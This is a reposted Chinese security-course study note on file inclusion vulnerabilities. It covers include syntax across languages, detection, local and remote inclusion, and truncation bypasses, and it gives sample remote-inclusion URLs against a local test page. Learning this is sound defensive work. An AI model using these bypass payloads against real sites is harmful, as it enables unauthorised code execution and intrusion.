<%@include file="head.jsp"%>._小迪安全31天">
当前位置:   article > 正文

小迪安全学习笔记--第31天:web漏洞-文件操作是文件包含漏洞全解_小迪安全31天

小迪安全31天

在这里插入图片描述

文件包含示例代码

<!---#include file=" 1.asp" -->
<! --#include file="top. aspx" -->
<c : import url="http : / /thief.one/1.jsp">
<jsp:include page=" head .jsp" / >
<%@include file="head.jsp"%>
<?php Include ( 'test.php ' ) ?>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6

文件包含漏洞的原理,检测,类型,利用,修复等

原理:将指定文件的内容按照代码的格式进行执行

成因:可控制的变量,函数的执行

检测:白盒和黑盒检测,白盒可以使用代码审计,黑盒可以使用漏扫,公开漏洞,手工看参数值以及功能点

类型:包含本地包含和远程包含两种。远程包含的危害更大一些。

利用:根据不同的协议利用不同

本地包含的有限制和无限制

无限制就是随便包含,有限制就是可能在文件包含的时候必须要满足指定的格式,面对这种情况,可以采用%00截断或者长度截断。长度节点windows中点号要长于256,linux要长于4096

远程包含的有限制和无限制

在php中远程包含存在开关,allow_url_include

有限制和无限制是与本地包含类似的

有限制的绕过可以采用%20 %23 ?等断开

http:/ /127.0.0.1:8080/include.php?filename=http://www.xiaodi8.com/readme.txt%20
http:/ /127.0.0.1:8080/include.php?filename=http://www.xiaodi8.com/readme.txt%23
http:/ /127.0.0.1:8080/include.php?filename=http://www.xiaodi8.com/readme.txt ?

在这里插入图片描述

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/凡人多烦事01/article/detail/481971
推荐阅读
相关标签